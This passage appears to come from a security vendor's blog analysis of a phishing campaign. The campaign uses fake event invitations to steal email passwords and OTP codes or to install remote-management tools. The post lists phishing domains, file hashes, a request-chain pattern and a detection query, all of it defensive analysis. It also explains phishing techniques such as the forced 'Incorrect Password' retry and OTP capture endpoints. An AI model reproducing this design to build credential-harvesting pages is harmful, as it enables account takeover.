<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="499" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image24-1024x499.png" alt="TI Lookup showing relevant industries and submission countries for broader context " class="wp-image-20670" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image24-1024x499.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image24-300x146.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image24-768x375.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image24-1536x749.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image24-370x180.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image24-270x132.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image24-740x361.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image24.png 1706w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI&nbsp;Lookup&nbsp;showing relevant industries and submission countries for broader context</em>&nbsp;</figcaption></figure></div>


<p>The most affected industries include <strong>Education, Banking, Government, Technology, and Healthcare</strong> — sectors where email access, identity, and remote administration are part of everyday operations.</p>



<p>For CISOs in these sectors, the concern is practical: one fake invitation can lead to stolen mailbox access, intercepted OTP codes, or a remote access tool running inside the environment.</p>



<p>The campaign also shows signs of scale. Threat actors appear to use a single framework to mass-deploy event-themed lure sites, while some page elements suggest possible AI-assisted generation. For security teams, this means the attack surface can change quickly, but the repeatable structure creates detection opportunities. When SOC teams can catch these patterns early, they can reduce investigation uncertainty, validate threats faster, and contain phishing activity before it turns into account compromise or remote access.</p>



<h2 class="wp-block-heading">How&nbsp;the&nbsp;Campaign&nbsp;Moves&nbsp;From&nbsp;Lure&nbsp;to&nbsp;Access&nbsp;</h2>



<p>On April 22, 2026, ANY.RUN researchers&nbsp;identified&nbsp;a phishing campaign targeting email service credentials and, in some cases, delivering remote management software.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="538" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Chain-1024x538.png" alt="Full attack chain of the phishing campaign" class="wp-image-20731" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Chain-1024x538.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Chain-300x158.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Chain-768x403.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Chain-1536x806.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Chain-2048x1075.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Chain-370x194.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Chain-270x142.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Chain-740x389.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Full attack chain of the phishing campaign</em></figcaption></figure></div>


<h3 class="wp-block-heading">Fake&nbsp;Invitation&nbsp;Pages&nbsp;as&nbsp;the&nbsp;Entry&nbsp;Point&nbsp;</h3>



<p>The campaign uses fake event invitation pages as the main lure. Victims are first taken through a CAPTCHA check, most often from Cloudflare, although other providers also appear in some cases. After that, they land on a phishing page telling them they have received an invitation.</p>



<p>From there, the campaign can move in two directions. Some pages are built to steal credentials. Others are designed to deliver remote management tools.&nbsp;</p>



<p>In the RMM delivery flow, the page may show a single download button or skip the button entirely and start the download automatically. In one ANY.RUN analysis session, the lure page starts the download without requiring further action from the user:</p>



<p><a href="https://app.any.run/tasks/4c2687da-1426-43c3-8e16-868f90fb9361?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View analysis session with lure</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="554" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11-1024x554.png" alt="Fake invitation used as a lure" class="wp-image-20671" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11-1024x554.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11-300x162.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11-768x415.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11-1536x831.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11-370x200.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11-270x146.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11-740x400.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11.png 1875w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Fake&nbsp;invitation&nbsp;used&nbsp;as&nbsp;a&nbsp;lure</em></figcaption></figure></div>


<p>In another session, the page includes a download button, but the file still begins downloading automatically:&nbsp;</p>



<p><a href="https://app.any.run/tasks/dcbc4301-f029-491c-afa6-8b896c538887/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View analysis session with download button</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="577" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image12-1024x577.png" alt="Analysis session with fake invitation  " class="wp-image-20672" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image12-1024x577.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image12-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image12-768x433.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image12-1536x865.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image12-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image12-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image12-740x417.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image12.png 1871w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Analysis&nbsp;session&nbsp;with&nbsp;fake&nbsp;invitation&nbsp;</em>&nbsp;</figcaption></figure></div>


<p>Additional&nbsp;lure pages following the same pattern were also&nbsp;observed:&nbsp;</p>



<p><a href="https://app.any.run/tasks/a99ce750-89b1-4012-82aa-5a125bf029a8?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View analysis session</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="555" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image13-1024x555.png" alt="Analysis session with a download button to download the invitation " class="wp-image-20673" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image13-1024x555.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image13-300x163.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image13-768x417.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image13-1536x833.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image13-370x201.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image13-270x146.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image13-740x401.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image13.png 1875w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Analysis session with a download button to download&nbsp;the invitation</em>&nbsp;</figcaption></figure></div>


<p>Check out other&nbsp;sandbox&nbsp;sessions with the fake invitation:&nbsp;</p>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/92d3a4b3-42ba-46b1-b5bb-68ed6e442b24/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Analysis session 1</a>&nbsp;</li>



<li><a href="https://app.any.run/tasks/81afb42c-f072-4df9-a2e4-013a1ac340f4/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Analysis session 2</a>&nbsp;</li>
</ul>



<p>ANY.RUN researchers also found signs that some pages were created using a shared phishing site&nbsp;toolkit, or&nbsp;phish kit. The code in several sessions&nbsp;contained&nbsp;instructions for the campaign operator on how to edit the page, suggesting a reusable setup for building and launching new lure sites quickly:&nbsp;</p>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/4c2687da-1426-43c3-8e16-868f90fb9361?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Analysis session&nbsp;1</a>&nbsp;</li>



<li><a href="https://app.any.run/tasks/f9e3acb4-542a-48f1-810c-30bebb209f2f?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Analysis session 2</a>&nbsp;&nbsp;</li>
</ul>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="900" height="395" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Image-16.png" alt="" class="wp-image-20675" style="width:572px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Image-16.png 900w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Image-16-300x132.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Image-16-768x337.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Image-16-370x162.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Image-16-270x119.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Image-16-740x325.png 740w" sizes="(max-width: 900px) 100vw, 900px" /></figure></div>

<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="281" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Image-17-1024x281.png" alt="Instructions on how to edit the page, written for campaign operators " class="wp-image-20674" style="width:576px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Image-17-1024x281.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Image-17-300x82.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Image-17-768x210.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Image-17-370x101.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Image-17-270x74.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Image-17-740x203.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Image-17.png 1237w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Instructions on how to edit the page, written for&nbsp;campaign operators</em>&nbsp;</figcaption></figure></div>


<p>The examples above represent a sample of the activity observed by ANY.RUN researchers and illustrate the common structure used in phishing pages that deliver RMM tools.</p>



<p>The remote management tools most often installed in these campaigns include <strong>ScreenConnect, ITarian, Datto RMM, ConnectWise, and LogMeIn Rescue</strong>.</p>



<p>When the goal is credential theft, the page changes, but the entry point stays the same. In this analysis session, the chain also begins with a CAPTCHA check:</p>



<p><a href="https://app.any.run/tasks/736d9138-d8fd-4934-af74-1780ea0bc80a/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Check analysis session</a>&nbsp;</p>



<p>After the check, the user is shown an event invitation message and prompted to sign in with one of the available services. An example of this message is shown below:</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="545" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image2-1024x545.png" alt="Example message to sign in an event " class="wp-image-20676" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image2-1024x545.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image2-300x160.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image2-768x409.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image2-1536x818.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image2-370x197.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image2-270x144.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image2-740x394.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image2.png 1870w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Example&nbsp;message&nbsp;to&nbsp;sign&nbsp;in&nbsp;an&nbsp;event</em>&nbsp;</figcaption></figure></div>


<h3 class="wp-block-heading">Reusable&nbsp;phishing&nbsp;infrastructure&nbsp;</h3>



<p>The&nbsp;credential&nbsp;theft&nbsp;pages&nbsp;follow&nbsp;a&nbsp;consistent&nbsp;structure&nbsp;across&nbsp;the&nbsp;phishing&nbsp;domains. In&nbsp;most&nbsp;cases,&nbsp;only&nbsp;the&nbsp;logo&nbsp;at&nbsp;the&nbsp;top&nbsp;of&nbsp;the&nbsp;page&nbsp;changes.&nbsp;</p>



<p>The phishing URLs also follow a repeatable format: https://&lt;phish-site&gt;/&lt;url-pattern&gt;/&lt;endpoint&gt;</p>



<p>Domain names often include words related to events, invitations, greetings, parties, and similar themes. Examples include <strong>festiveparty.us</strong>, <strong>getceptionparty[.]de</strong>, and <strong>celebratieinvitiee[.]de</strong>, all of whichwere observed in related ANY.RUN analysis sessions:</p>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/a1b85a4f-6985-4b16-b8b4-d802012524af?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Analysis session with&nbsp;getceptionparty[.]de</a>&nbsp;</li>



<li><a href="https://app.any.run/tasks/cf3fed11-dbd7-4541-8e82-a9ecd225e0e6/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Analysis session with celebratieinvitiee[.]de</a>&nbsp;</li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Turn phishing patterns into full campaign context. 
 <br>
<span class="highlight">Bring ANY.RUN threat analysis and intelligence into your SOC. <br></span></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/plans-ti/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=US-fake-invitation-phishing&#038;utm_term=050526&#038;utm_content=linktotipricing#contact-sales" rel="noopener" target="_blank">
Contact us
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>Another&nbsp;campaign&nbsp;marker&nbsp;is&nbsp;the&nbsp;way&nbsp;service&nbsp;icons&nbsp;are&nbsp;loaded&nbsp;on&nbsp;the&nbsp;phishing&nbsp;page. The&nbsp;icons&nbsp;are&nbsp;consistently&nbsp;stored&nbsp;under&nbsp;the&nbsp;same&nbsp;path:&nbsp;/Image/*.png&nbsp;</p>



<p>The&nbsp;typical&nbsp;icon&nbsp;set&nbsp;includes:&nbsp;</p>



<ul class="wp-block-list">
<li>office360.png&nbsp;<br>(SHA-256 887bc414bdb32b83dcfccdd3c688e90d9a87a0033e3756a840f9bdd2d65c5c74);&nbsp;</li>



<li>office.png&nbsp;<br>(SHA-256 6eaa0a448f1306bcf4159783eeafe5d37243bd8ca2728db7d90de1929241dd29);&nbsp;</li>



<li>yahoo.png&nbsp;<br>(SHA-256 4c373bc25cb71dbb75e73b61dff25aa184be8d327053a97202a6b1a5919cab0d);&nbsp;</li>



<li>google.png&nbsp;<br>(SHA-256 a838f99537d35e48e479a34086297f76db5d3363b0456f23d10d308f0d30ed82);&nbsp;</li>



<li>aol.png&nbsp;<br>(SHA-256 8e94c18bbcad0644c4b04de4356fe37da9996fdf1c99bc984ba819862a9b1889);&nbsp;</li>



<li>email.png&nbsp;<br>(SHA-256 9a53e032a6e3e79861d28568c3b6ffc97f4f3c1d3af65a703ec12966420503d9).&nbsp;</li>
</ul>



<p>Another distinctive feature of this campaign is the sequential request for the following resources: &lt;evilsite&gt;/favicon.ico &lt;evilsite&gt;/blocked.html</p>



<p>As a result, when a user opens the phishing link, the following request chain is always&nbsp;observed:&nbsp;</p>



<p><code>GET /&nbsp;&nbsp;<br>&nbsp; ├─ GET /favicon.ico&nbsp;<br>&nbsp; ├─ GET /blocked.html&nbsp;<br>&nbsp; └─ GET /&lt;url-pattern&gt;/Image/*.png&nbsp;</code></p>



<p>This request chain can be&nbsp;observed&nbsp;in the following ANY.RUN analysis session:</p>



<p><a href="https://app.any.run/tasks/590eb0b6-2738-434d-965e-5dad01ab3bb4?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Check analysis with observed request chain</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="813" height="335" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image18.png" alt="Request chain observed inside ANY.RUN sandbox " class="wp-image-20677" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image18.png 813w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image18-300x124.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image18-768x316.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image18-370x152.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image18-270x111.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image18-740x305.png 740w" sizes="(max-width: 813px) 100vw, 813px" /><figcaption class="wp-element-caption"><em>Request&nbsp;chain&nbsp;observed&nbsp;inside&nbsp;ANY.RUN&nbsp;sandbox</em></figcaption></figure></div>


<p>&lt;url-pattern&gt; is unique for each domain, but it often follows the same naming logic and includes repeated event-related keywords.</p>



<p>Analysts can use this pattern to find related phishing domains in ANY.RUN’s <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> with the following query: <a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktotilookup#{%22query%22:%22url:%5C%22/blocked.html%5C%22%20AND%20url:%5C%22/favicon.ico%5C%22%20and%20url:%5C%22/Image/*.png%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">url:&#8221;/blocked.html&#8221; AND url:&#8221;/favicon.ico&#8221; and url:&#8221;/Image/*.png&#8221;</a></p>



<h3 class="wp-block-heading">Credential&nbsp;Interception&nbsp;Flows&nbsp;</h3>



<p>The campaign uses two credential interception flows: one for <strong>Google accounts</strong> and another for <strong>non-Google services</strong>. The following ANY.RUN analysis session shows both flows in action:</p>



<p><a href="https://app.any.run/tasks/590eb0b6-2738-434d-965e-5dad01ab3bb4?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Check analysis session with both interception flows</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="568" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-14.45.04-1024x568.png" alt="" class="wp-image-20712" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-14.45.04-1024x568.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-14.45.04-300x166.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-14.45.04-768x426.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-14.45.04-1536x852.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-14.45.04-2048x1136.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-14.45.04-370x205.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-14.45.04-270x150.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-14.45.04-740x411.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Analysis session with both interception flows</em></figcaption></figure></div>


<h4 class="wp-block-heading"><em>Non-Google&nbsp;credential&nbsp;interception</em>&nbsp;</h4>



<p>When the user selects any service other than Google, the phishing page opens a login window asking for an email address and password, as shown below.</p>



<p>After the first password entry, the page always displays an <strong>“Incorrect Password”</strong> message. This prompts the user to enter the password again, helping the attackers capture a second attempt in case the first one contained a typo.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="584" height="641" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image5.png" alt="Google login window, asking for an email address and password" class="wp-image-20678" style="width:358px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image5.png 584w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image5-273x300.png 273w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image5-370x406.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image5-270x296.png 270w" sizes="(max-width: 584px) 100vw, 584px" /><figcaption class="wp-element-caption"><em>Google&nbsp;login&nbsp;window,&nbsp;asking&nbsp;for&nbsp;an&nbsp;email&nbsp;address&nbsp;and&nbsp;password</em></figcaption></figure></div>


<p>When the user enters their credentials and clicks <strong>Login</strong>, the page sends a <strong>POST</strong> request to the same server at the /processmail.php endpoint, submitting the email address and password.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="239" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_1-1024x239.png" alt="POST resuest to the server at the /processmail.php endpoint" class="wp-image-20679" style="width:650px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_1-1024x239.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_1-300x70.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_1-768x179.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_1-370x86.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_1-270x63.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_1-740x173.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_1.png 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure></div>

<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="595" height="112" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1b.png" alt="" class="wp-image-20680" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1b.png 595w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1b-300x56.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1b-370x70.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1b-270x51.png 270w" sizes="(max-width: 595px) 100vw, 595px" /><figcaption class="wp-element-caption"><em>POST&nbsp;resuest&nbsp;to the server at the /processmail.php&nbsp;endpoint</em></figcaption></figure></div>


<p>Then, an OTP code entry form appears. This form is also the same across all phishing sites used in this campaign.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="497" height="340" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image7.png" alt="Fake entry form used in all phishing sites " class="wp-image-20681" style="width:439px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image7.png 497w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image7-300x205.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image7-370x253.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image7-270x185.png 270w" sizes="(max-width: 497px) 100vw, 497px" /><figcaption class="wp-element-caption"><em>Fake&nbsp;entry&nbsp;form&nbsp;used&nbsp;in&nbsp;all&nbsp;phishing&nbsp;sites</em>&nbsp;</figcaption></figure></div>


<p>When the user enters the code and clicks <strong>Submit</strong>, the page sends a <strong>POST</strong> request to the same server at the /process.php endpoint, submitting the OTP code.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="273" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_3-1024x273.png" alt="" class="wp-image-20682" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_3-1024x273.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_3-300x80.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_3-768x205.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_3-370x99.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_3-270x72.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_3-740x197.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_3.png 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure></div>

<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="643" height="85" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1e.png" alt="POST request to the server " class="wp-image-20683" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1e.png 643w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1e-300x40.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1e-370x49.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1e-270x36.png 270w" sizes="(max-width: 643px) 100vw, 643px" /><figcaption class="wp-element-caption"><em><em>POST&nbsp;request&nbsp;to&nbsp;the&nbsp;server</em>&nbsp;</em></figcaption></figure></div>


<p>After&nbsp;the&nbsp;OTP&nbsp;is&nbsp;entered,&nbsp;the&nbsp;page&nbsp;displays&nbsp;a&nbsp;placeholder&nbsp;message,&nbsp;as&nbsp;shown&nbsp;in&nbsp;the&nbsp;image&nbsp;below.&nbsp;At&nbsp;this&nbsp;stage,&nbsp;the&nbsp;credentials&nbsp;needed&nbsp;to&nbsp;access&nbsp;the&nbsp;service&nbsp;are&nbsp;already&nbsp;in&nbsp;the&nbsp;attacker’s&nbsp;hands.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="646" height="602" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image9.png" alt="A placeholder message displayed inside ANY.RUN sandbox" class="wp-image-20684" style="width:456px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image9.png 646w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image9-300x280.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image9-370x345.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image9-270x252.png 270w" sizes="(max-width: 646px) 100vw, 646px" /><figcaption class="wp-element-caption"><em>A&nbsp;placeholder&nbsp;message&nbsp;displayed&nbsp;inside&nbsp;ANY.RUN&nbsp;sandbox</em></figcaption></figure></div>


<h4 class="wp-block-heading"><em>Google&nbsp;credential&nbsp;interception</em>&nbsp;</h4>



<p>When the user selects Gmail as the login method, a different chain is observed. First, the user is redirected to a page disguised as a Google authorization form.</p>


<div class="wp-block-image">
